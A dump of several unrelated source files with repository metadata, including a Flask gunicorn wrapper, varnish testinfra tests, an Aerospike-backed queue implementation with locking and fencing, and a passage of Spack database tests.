kernels_info[name]["outputs"] = list(
set(registry_info["outputs"] +
kernels_info[name]["outputs"]))
else:
kernels_info[name] = registry_info
compat_registry_ = remove_grad_registry(kernels_info)
return compat_registry_
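A hedged demonstration of parse_compat_registry on a hand-written signature string (the kernel and argument names are made up): the function splits on ",{" and strips the trailing braces to recover the input, attribute and output lists.
sample = "matmul,{X,Y},{trans_x,trans_y},{Out}"
name, info = parse_compat_registry(sample)
print(name)             # matmul
print(info["inputs"])   # ['X', 'Y']
print(info["attrs"])    # ['trans_x', 'trans_y']
print(info["outputs"])  # ['Out']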
| 36.891304
| 76
| 0.560401
|
e7e1f43af2e4ba2e33de780ac026d1551c6558b4
| 91
|
py
|
Python
|
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | 1
|
2017-10-12T11:52:33.000Z
|
2017-10-12T11:52:33.000Z
|
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | null | null | null |
without_pkg_resources.py
|
scopatz/import-profiling
|
13e5a8b4cce573191c4b7526ff11e91ab261c6e0
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
sys.modules['pkg_resources'] = None
import pygments.styles
import prompt_toolkit
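A hedged side note on the trick used above: assigning None to a sys.modules entry makes any later import of that name raise ImportError, which is how the script keeps pkg_resources out of the measured imports. The module name below is hypothetical.
import sys

sys.modules['some_heavy_dependency'] = None  # hypothetical name, for illustration only
try:
    import some_heavy_dependency  # noqa: F401
except ImportError:
    print("import blocked as expected")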
| 22.75
| 35
| 0.835165
|
a3452f9666aadd1d7d07bd4dfaa6a11f43833b72
| 1,205
|
py
|
Python
|
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
py_proj/server.py
|
maryno-net/py-project
|
a8db26494087a9a290553ba0bfaa692c9000dde1
|
[
"MIT"
] | null | null | null |
"""
py_proj.server
~~~~~~~~~~~~~~
Модуль серверных приложений.
"""
import sys
from gunicorn.app.base import Application
class FlaskGunicornApplication(Application):
"""Gunicorn-приложение для py_proj."""
def __init__(self, app, config, *args, **kwargs):
#: The Flask application
self.app = app
#: Application configuration dictionary
self.config = config
# Prevent command-line arguments from being passed to the application
sys.argv = [sys.argv[0]]
super(FlaskGunicornApplication, self).__init__(*args, **kwargs)
def init(self, parser, opts, args):
"""Инициализирует конфигурацию приложения.
Метод переопределяет родительский для использования конфигурации,
с которой было инициализировано приложение.
:param parser: Объект argparse.ArgumentParser конфигурации.
:param opts: Опции командной строки.
:param args: Аргументы командной строки.
"""
return self.config
def load(self):
"""Загружает приложение.
Метод переопределяет родительский для возврата Flask-приложения,
с которым было инициализировано приложение.
"""
return self.app
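A hedged usage sketch (the Flask app and the gunicorn settings dict are illustrative, not taken from the project): wrap a Flask application in FlaskGunicornApplication and run it.
from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    return "ok"

if __name__ == "__main__":
    # Illustrative gunicorn settings; any valid gunicorn configuration keys could go here.
    config = {"bind": "0.0.0.0:8000", "workers": 2}
    FlaskGunicornApplication(app, config).run()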
| 28.023256
| 73
| 0.656432
|
ca0acfa933231de70a3c5a2d92cae9f4fd3e1ec9
| 865
|
py
|
Python
|
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | 1
|
2022-01-11T08:03:32.000Z
|
2022-01-11T08:03:32.000Z
|
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | null | null | null |
preprocess/MLDCTD.py
|
bmd2007/benchmark_eval
|
aa42bb3369e79db4cb63e1963afcc8af6d8f5696
|
[
"MIT"
] | null | null | null |
import sys, os
currentdir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(currentdir)
from CTD_Composition import CTD_Composition
from CTD_Distribution import CTD_Distribution
from CTD_Transition import CTD_Transition
from PreprocessUtils import STDecode
from PreprocessUtils import MLDEncode
# default groups are based on the conjoint triad method
def MLDCTD(fastas, numSplits=4, groupings = ['AGV','ILFP','YMTS','HNQW','RK','DE','C'], deviceType='cpu'):
encoded, encodedSize = MLDEncode(fastas,numSplits)
comp = CTD_Composition(encoded,groupings,deviceType)
tran = CTD_Transition(encoded,groupings,deviceType)
dist = CTD_Distribution(encoded,groupings,deviceType)
comp = STDecode(comp,encodedSize)
tran = STDecode(tran,encodedSize)
dist = STDecode(dist,encodedSize)
return (comp, tran, dist)
| 27.03125
| 107
| 0.752601
|
ca47b0e99a0953643c1ae5ba2b89367f35409dad
| 552
|
py
|
Python
|
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
molecule/default/tests/test_default.py
|
sys-fs/ansible-role-varnish
|
0dcea0da0013c705478aba36107fb6c0ac4de47e
|
[
"MIT"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_package(host):
pkg = host.package('varnish')
assert pkg.is_installed
def test_service(host):
service = host.service('varnish')
assert service.is_running
def test_secret(host):
secret = host.file('/etc/varnish/secret')
assert secret.exists
assert secret.mode == 0o400
assert secret.user == 'root'
assert secret.group == 'root'
| 21.230769
| 63
| 0.721014
|
bef5da146c6478b80a0c2285d70e76df93284b90
| 25,099
|
py
|
Python
|
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | 2
|
2020-09-03T06:26:38.000Z
|
2021-06-23T22:28:00.000Z
|
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | null | null | null |
large_queue.py
|
neelp-git/aerospike-large-queue
|
82dc3bff0dcb94065905f9ccf566f01eaa2e127c
|
[
"Apache-2.0"
] | null | null | null |
# large_queue.py
"""
LargeQueue
The implementation provides a rough solution for certain issues when implementing a FIFO queue or a circular buffer
in Aerospike.
1. Large queue size. The List data type in Aerospike can be easily leveraged to implement a queue. However
the maximum Aerospike record size is 8MB which is the outer limit of the queue size thus implemented.
LargeQueue allows an arbitrarily sized queue by using multiple records.
2. Consistency across multiple records. In Aerospike, single record operations are atomic. Queue operations are
performed under a queue lock to preserve consistency across multiple records.
- Slow clients and client failures. A new lock request will break the old lock if it is timed out.
- Operations whose lock is broken. Updates are prevented from committing if their lock is broken by
checking if the lock is still held before committing new head/tail pointers in the metadata record.
- Rollback of failed updates (broken locks). A rollback of an update is not necessary as a commit happens
in a final atomic step on a single metadata record where the head/tail pointers are updated.
3. Fencing to guard against lingering invalid writes. An enqueue operation whose lock is broken is prevented from
overwriting a subsequent valid enqueue entry by use of a fencing marker in the record. Only writes
with a higher fencing token than the last fencing marker in the record are allowed.
4. Efficient operations. With a circular buffer implementation, head/tail pointers can be advanced monotonically
without costly copy and space management.
- Offset based access to entries. A monotonically increasing offset indicates the position of an entry
in the queue, and an entry can be read using a valid offset without acquiring a lock.
Design
The FIFO queue is implemented as a circular buffer using a "metadata" record that holds queue metadata such as the
lock info and head/tail positions and several "buffer" records that hold the entries in the queue.
The head points to the first entry and the tail points to position AFTER the last entry. An empty and full queue
point to the same physical position in the circular buffer, the difference being that the head and tail offsets
are different for a full queue by the circular buffer size.
An enqueue and dequeue operation acquire the lock in the metadata record, read or write the head or tail entry,
and in the last step atomically release the lock and update head/tail pointer. A lock that has expired is
broken by a new lock request and the lock is granted to the requester. The old requester cannot commit as
the commit step checks that the lock is still held by the requester; if not, the request is aborted. Similarly,
the old requester is prevented from overwriting a valid entry with a fencing scheme. Each enqueue request gets a
monotonically increasing fencing token, and updates the buffer record with fencing token as it appends
the new entry. An older enqueue operation with a smaller fencing token than in the record is disallowed.
The enqueue operation allows the circular buffer to be overwritten when the queue is full with the
parameter "overwrite_if_full" parameter. By default, this parameter is False and an exception is raised.
A monotonically increasing queue "offset" is maintained and an entry can be read with a valid offset (that is,
between head and tail positions) with "get_entry_by_offset". This function requires no lock and offers no
guarantee that an entry exists or has not been removed at that offset.
The "transaction-id" required to assign the lock needs to be unique across all concurrent requests. It need not
be unique across operations that are not concurrent.
Potential future enhancements
- Allow many consumer groups each with its own tracking metadata.
- Separate namespaces to store metadata and buffer records. Performance can benefit by storing the metadata
namespace in faster persistent storage (like PMEM).
- Extend metadata record to hold recent committed transactions for the ability to ascertain status by
transaction-id when various failures make an operation outcome unknown and the operation cannot
be simply resubmitted.
"""
from __future__ import print_function
import time
import aerospike
from aerospike import predexp as predexp
from aerospike import exception as exception
from aerospike_helpers.operations import operations as op_helpers
from aerospike_helpers.operations import list_operations as list_helpers
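# Hedged, self-contained illustration (not part of the original module) of the
# fencing rule described in the module docstring: a writer may only update a
# buffer record if its fencing token is strictly greater than the record's
# current fencing marker, so a stale enqueue whose lock was broken cannot
# overwrite a newer valid entry.
def _fencing_allows_write(record_fencing_mark, writer_fencing_token):
    # Mirrors the predexp used in enqueue(): integer_bin("fencing-mark") < token.
    return record_fencing_mark < writer_fencing_token

assert _fencing_allows_write(7, 9)       # newer token may write
assert not _fencing_allows_write(9, 7)   # stale token is rejected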
class ASAborted(Exception):
def __init__(self, reason):
self.reason = reason
class LargeQueue(object):
META_REC_KEY = 'queue-metadata'
BUF_REC_KEY_PREFIX = 'queue-buffer-'
LOCK_MAX_RETRIES = 3
LOCK_POLL_WAIT_MS = 100
LOCK_EXPIRATION_MS = 200
# Enum for queue operations implemented as class variables
class Ops:
Dequeue = 1
Enqueue = 2
@staticmethod
def _buf_record_key(rec_index):
return LargeQueue.BUF_REC_KEY_PREFIX + str(rec_index)
@staticmethod
def _curr_time_milliseconds():
return int(time.time() * 1000)
def __init__(self):
"""
The null constructor.
"""
self.client = None
self.namespace = None
self.name = None
self.slots_per_rec = None
self.num_buf_recs = None
self.initialized = False
@staticmethod
def _get_metadata(client, namespace, q_name):
"""
Get the metadata record.
:param client: client object returned by aerospike.connect()
:param namespace: namespace where the queue records are stored
:param q_name: name of the queue, used as the "set" name
:return: metadata record if queue exists, otherwise None
"""
metadata_key = (namespace, q_name, LargeQueue.META_REC_KEY)
try:
(key, meta, record) = client.get(metadata_key)
except exception.RecordNotFound as ex:
return None
return record
def get_queue_info(self):
"""
Get queue info.
:return: a dict with externally visible attributes of the queue
"""
if not self.initialized:
return None
record = LargeQueue._get_metadata(self.client, self.namespace, self.name)
return { 'name': self.name,
'max-size': self.num_buf_recs * self.slots_per_rec,
'namespace': self.namespace,
'head-offset': int(record['head-offset']),
'tail-offset': int(record['tail-offset']) }
def _create_metadata_record(self):
"""
Create a metadata record for a new queue.
:throws: ASAborted('Queue already exists')
"""
# create the metadata record
write_policy = { 'exists': aerospike.POLICY_EXISTS_CREATE,
'key': aerospike.POLICY_KEY_SEND }
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
metadata_bins = { 'locked': 0,
'lock-owner': None,
'lock-time-ms': None,
'head-offset': 0,
'tail-offset': 0,
'fencing-ctr': 0,
'num-buf-recs': self.num_buf_recs,
'slots-per-rec': self.slots_per_rec }
try:
self.client.put(metadata_key, metadata_bins, write_policy)
except exception.RecordExistsError as ex:
raise ASAborted('Queue already exists')
return
def _create_buf_records(self):
"""
Create buffer records for a new queue.
"""
# insert buffer records
write_policy = { 'exists': aerospike.POLICY_EXISTS_CREATE_OR_REPLACE,
'key': aerospike.POLICY_KEY_SEND }
buf_bins = { 'fencing-mark': 0,
'entries': [] }
for i in range(self.slots_per_rec):
buf_bins['entries'].append({ 'offset': -1, 'value': None })
for i in range(self.num_buf_recs):
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(i))
_ = self.client.put(buf_key, buf_bins, write_policy)
return
def _reset_fencing_marks(self):
"""
Reset the fencing marker in buffer and metadata records when the fencing counter in metadata record wraps
around to a non-positive value. While this operation is likely to be very infrequent, if needed at all
(a long fencing counter should make it unnecessary), it is critical that it succeed.
If it fails for some reason, enqueue operations will fail due to fencing error until the fencing marker is
reset.
"""
write_policy = { 'exists': aerospike.POLICY_EXISTS_UPDATE }
try:
for i in range(self.num_buf_recs):
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(i))
self.client.put(buf_key, {'fencing-mark': 0}, write_policy)
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
self.client.put(metadata_key, {'fencing-ctr': 0}, write_policy)
except Exception as ex:
print('LargeQueue: critical error. Failure during reset of fencing marks', ex)
raise ex
return
def create_new_queue(self, client, namespace, q_name, max_size, slots_per_rec):
"""
Create a new queue using the input parameters.
:param client: client object returned by aerospike.connect()
:param namespace: namespace in which the queue records are to be stored
:param q_name: name of the queue, used as the "set" name
:param max_size: maximum number of entries to be held in the queue
:param slots_per_rec: number of entries per record, depending on the size of entry. must be carefully
selected otherwise record overflow can result at runtime.
"""
self.client = client
self.namespace = namespace
self.name = q_name
self.slots_per_rec = slots_per_rec
self.num_buf_recs = (max_size + self.slots_per_rec - 1) // self.slots_per_rec
self._create_metadata_record()
self._create_buf_records()
self.initialized = True
return
def initialize_existing_queue(self, client, namespace, q_name):
"""
Initialize an existing queue in the given namespace with the given name.
:param client: client object returned by aerospike.connect().
:param namespace: namespace in which the queue is stored
:param q_name: name of the queue
"""
metadata = LargeQueue._get_metadata(client, namespace, q_name)
if metadata is None:
raise ASAborted('Queue does not exist')
self.client = client
self.namespace = namespace
self.name = q_name
self.slots_per_rec = metadata['slots-per-rec']
self.num_buf_recs = metadata['num-buf-recs']
self.initialized = True
return
def _lock(self, txn_id, op):
"""
Atomically check if the queue is locked, break an expired lock, lock the queue and
set the lock-owner and lock-time, and if the operation is enqueue, also increment and
return the fencing counter.
Try multiple times if the lock is not available, and wait before subsequent attempt.
:param txn_id: lock owner id, must be unique among concurrent requests
:param op: enqueue or dequeue
:return: dict with head and tail positions on success
throws ASAborted('Failed to acquire lock') on failure
"""
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
for _ in range(LargeQueue.LOCK_MAX_RETRIES):
curr_time_ms = LargeQueue._curr_time_milliseconds()
predexps = [ predexp.integer_bin("locked"),
predexp.integer_value(0),
predexp.integer_equal(),
predexp.integer_bin("lock-time-ms"),
predexp.integer_value(curr_time_ms-LargeQueue.LOCK_EXPIRATION_MS),
predexp.integer_less(),
predexp.predexp_or(2) ]
ops = [ op_helpers.read('head-offset'),
op_helpers.read('tail-offset'),
op_helpers.write('locked', 1),
op_helpers.write('lock-owner', txn_id),
op_helpers.write('lock-time-ms', curr_time_ms) ]
if op == LargeQueue.Ops.Enqueue:
ops.append(op_helpers.increment('fencing-ctr', 1))
ops.append(op_helpers.read('fencing-ctr'))
try:
_, _, record = self.client.operate(metadata_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex: # predexp failed
time.sleep(LargeQueue.LOCK_POLL_WAIT_MS/1000.0)
continue
return record
raise ASAborted('Failed to acquire lock')
def _commit_release(self, txn_id, new_head_offset=None, new_tail_offset=None):
"""
If the lock is still held by this requester (txn-id), update the new positions of head/tail and
release the lock. Otherwise abort the request as timed out.
:param txn_id: lock owner id, must be unique among concurrent requests
:param new_head_offset: new head offset to be updated
:param new_tail_offset: new tail offset to be updated
:return: throws ASAborted('Timed out')
"""
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
predexps = [ predexp.integer_bin("locked"),
predexp.integer_value(1),
predexp.integer_equal(),
predexp.integer_bin("lock-owner"),
predexp.integer_value(txn_id),
predexp.integer_equal(),
predexp.predexp_and(2)]
ops = [ op_helpers.write('locked', 0),
op_helpers.write('lock-owner', None),
op_helpers.write('lock-time-ms', None) ]
if new_head_offset is not None:
ops.append(op_helpers.write('head-offset', new_head_offset))
if new_tail_offset is not None:
ops.append(op_helpers.write('tail-offset', new_tail_offset))
try:
_ = self.client.operate(metadata_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex: # predexp failed
raise ASAborted('Timed out')
return
def _get_entry_location(self, entry_offset):
"""
Get the record index and entry index within the record, given the entry's offset.
:param entry_offset: offset of the entry
:return: tuple (record index, entry index)
"""
buf_rec_index = (entry_offset // self.slots_per_rec) % self.num_buf_recs
entry_index = entry_offset % self.slots_per_rec
return buf_rec_index, entry_index
def _queue_is_full(self, head_offset, tail_offset):
"""
Check if the queue is full.
:param head_offset: Offset of the head entry.
:param tail_offset: Offset of the tail entry (next added entry).
:return: True if full, False otherwise
"""
num_entries = tail_offset - head_offset
return num_entries == self.num_buf_recs * self.slots_per_rec
def _queue_is_empty(self, head_offset, tail_offset):
"""
Check if the queue is empty.
:param head_offset: Offset of the head entry.
:param tail_offset: Offset of the tail entry (next added entry).
:return: True if empty, False otherwise
"""
return 0 == tail_offset - head_offset
def enqueue(self, entry, txn_id, overwrite_if_full=False):
"""
Append a new entry to the queue. Fails if the queue lock cannot be acquired. Can fail if the queue is full.
If the fencing counter has wrapped around, reset all fencing values.
:param entry: new entry to be enqueued
:param txn_id: lock owner id, must be unique among concurrent requests
:param overwrite_if_full: flag indicating if the head position should be overwritten if the queue is full
:return: Offset position of the enqueued entry. throws: ASAborted('Queue is full'), ASAborted('Timed out')
"""
q_state = self._lock(txn_id, LargeQueue.Ops.Enqueue)
# compute the record and list indices
head_offset = int(q_state['head-offset'])
tail_offset = int(q_state['tail-offset'])
fencing_ctr = q_state['fencing-ctr']
# if the fencing counter has a non-positive value, it has wrapped around past the max value; reset
if fencing_ctr <= 0:
self._reset_fencing_marks()
buf_rec_index, entry_index = self._get_entry_location(tail_offset) # tail points to where the new entry will go
entry_val = {'offset': tail_offset, 'entry': entry}
queue_is_full = self._queue_is_full(head_offset, tail_offset)
if queue_is_full and not overwrite_if_full:
self._commit_release(txn_id)
raise ASAborted('Queue is full')
predexps = [ predexp.integer_bin("fencing-mark"),
predexp.integer_value(fencing_ctr),
predexp.integer_less() ]
ops = [ op_helpers.write('fencing-mark', fencing_ctr),
list_helpers.list_set('entries', entry_index, entry_val) ]
buf_rec_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
try:
(_, _, record) = self.client.operate(buf_rec_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex:
raise ASAborted('Timed out')
self._commit_release(txn_id, new_head_offset=head_offset + 1 if queue_is_full else None,
new_tail_offset=tail_offset + 1)
return tail_offset
def dequeue(self, txn_id):
"""
Dequeue and return the entry at the head of the queue. If the queue is empty, returns None.
:param txn_id: lock owner id, must be unique among concurrent requests
:return: dict containing entry and offset for the entry at the head of the queue,
or None if the queue is empty
"""
q_state = self._lock(txn_id, LargeQueue.Ops.Dequeue)
# compute the record and list indices
head_offset = int(q_state['head-offset'])
tail_offset = int(q_state['tail-offset'])
if self._queue_is_empty(head_offset, tail_offset):
self._commit_release(txn_id)
return None
buf_rec_index, entry_index = self._get_entry_location(head_offset)
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
ops = [ list_helpers.list_get('entries', entry_index) ]
(_, _, record) = self.client.operate(buf_key, ops)
self._commit_release(txn_id, new_head_offset=head_offset+1)
return record['entries']
def get_entry_at_offset(self, offset):
'''
Get the entry at the given offset if the offset currently exists in the queue. The function
does not acquire the queue lock and offers no guarantee that an entry exists or has not been removed
at that offset.
:param offset: offset of the entry (offset is the monotonically increasing position in the queue)
:return: dict containing entry and offset if the entry at the offset is present in the queue, otherwise None
'''
# get head and tail offsets
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
metadata_bins = ['head-offset', 'tail-offset']
(_, _, q_state) = self.client.select(metadata_key, metadata_bins)
head_offset = int(q_state['head-offset'])
tail_offset = int(q_state['tail-offset'])
if (offset >= tail_offset) or (offset < head_offset):
return None
buf_rec_index, entry_index = self._get_entry_location(offset)
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
entry = self.client.list_get(buf_key, 'entries', entry_index)
if entry['offset'] != offset:
return None
return entry
# Usage and test examples
def main():
'''
Simple usage examples and tests.
'''
config = {
'hosts': [('172.28.128.4', 3000)],
'policies': {'timeout': 1200}
}
QUEUE_MAX_SIZE = 1000
ENTRIES_PER_REC = 100
client = aerospike.client(config).connect()
# Create a new queue or initialize an existing queue
msg_queue = LargeQueue()
try:
msg_queue.initialize_existing_queue(client, 'test', 'shared-msg-bus')
except ASAborted as ex:
msg_queue.create_new_queue(client, 'test', 'shared-msg-bus', QUEUE_MAX_SIZE, ENTRIES_PER_REC)
# Add entries
# add two messages
# note txn-id is used as lock owner id, and needs only to be unique across all active clients
# so we can use the same txn_id in the following operations
txn_id = 1
msg = {'msg-id': 100, 'msg-text': 'The school is closed for summer.'}
try:
offset = msg_queue.enqueue(msg, txn_id)
print('message 100 added at offset {}'.format(offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
msg = {'msg-id': 101, 'msg-text': 'Have a nice summer!'}
try:
offset = msg_queue.enqueue(msg, txn_id)
print('message 101 added at offset {}'.format(offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
# Get queue status
q_info = msg_queue.get_queue_info()
print('queue status: {}'.format(q_info))
# Read entry at offset
offset = q_info['head-offset'] + 1
msg_entry = msg_queue.get_entry_at_offset(offset)
print('entry at offset {}: {}'.format(offset, msg_entry))
# Pop the head entry
try:
msg_entry = msg_queue.dequeue(txn_id)
print('dequeued entry: {}'.format(msg_entry))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# end status of the queue
q_info = msg_queue.get_queue_info()
print('end status: {}'.format(q_info))
# TESTS
# create a queue with max size 10 with 3 entries per record
client = aerospike.client(config).connect()
test_queue = LargeQueue()
try:
test_queue.initialize_existing_queue(client, 'test', 'test_queue')
except ASAborted as ex:
test_queue.create_new_queue(client, 'test', 'test_queue', 10, 3)
# dequeue - empty queue
txn_id = 111
try:
entry = test_queue.dequeue(txn_id)
print('found: {}'.format(entry))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# enqueue/dequeue
entry = 999
try:
offset = test_queue.enqueue(entry, txn_id)
print('added: {} at offset: {}'.format(entry, offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
try:
out = test_queue.dequeue(txn_id)
print('dequeued: {}'.format(out))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# add 20 items
print('adding without overwrite')
for i in range(20):
try:
offset = test_queue.enqueue(i, txn_id)
print('added entry {} at offset {}'.format(i, offset))
except ASAborted as ex:
print('aborted: entry {}, reason: {}'.format(i, ex.reason))
print('adding with overwrite')
for i in (range(20)):
try:
offset = test_queue.enqueue(i, txn_id, True)
print('added entry {} at offset {}'.format(i, offset))
except ASAborted as ex:
print('aborted: entry {}, reason: {}'.format(i, ex.reason))
print('get info')
info = test_queue.get_queue_info()
print('info: {}'.format(info))
print('get entries at offset')
for i in range(info['head-offset'], info['tail-offset']):
entry = test_queue.get_entry_at_offset(i)
print('at offset {} got entry {}'.format(i, entry))
print('dequeue all entries')
while True:
try:
entry = test_queue.dequeue(txn_id)
print('dequeued entry: {}'.format(entry))
if entry is None:
print('done')
break
except ASAborted as ex:
print('aborted: reason: {}'.format(ex.reason))
break
exit(0)
if __name__ == "__main__":
main()
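A hedged, Aerospike-free sketch of the circular-buffer arithmetic the class relies on: offsets grow monotonically, the physical slot is derived from the offset modulo the buffer capacity, and full/empty are distinguished purely by the head/tail offset difference.
SLOTS_PER_REC = 3
NUM_BUF_RECS = 4                         # capacity = 12 entries
CAPACITY = SLOTS_PER_REC * NUM_BUF_RECS

def entry_location(offset):
    # Same mapping as LargeQueue._get_entry_location
    return (offset // SLOTS_PER_REC) % NUM_BUF_RECS, offset % SLOTS_PER_REC

def is_full(head, tail):
    return tail - head == CAPACITY

def is_empty(head, tail):
    return tail - head == 0

print(entry_location(0))    # (0, 0)
print(entry_location(13))   # (0, 1) -- wrapped around the 12-slot buffer
print(is_full(1, 13), is_empty(5, 5))  # True True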
| 45.884826
| 119
| 0.645882
|
8f0f4dff6abb029a5854c22d72b789f15654eaf6
| 28,798
|
py
|
Python
|
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null |
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2018-07-06T19:11:46.000Z
|
2018-07-06T19:12:28.000Z
|
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-03-06T11:04:37.000Z
|
2020-03-06T11:04:37.000Z
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.test.conftest import MockPackage, MockPackageMultiRepo
from spack.util.executable import Executable
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
x = MockPackage('x', [], [])
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
w = MockPackage('w', [x, y], [default, default])
mock_repo = MockPackageMultiRepo([w, x, y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
mock_repo = MockPackageMultiRepo([y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
x = MockPackage('x', [], [])
mock_repo = MockPackageMultiRepo([x])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
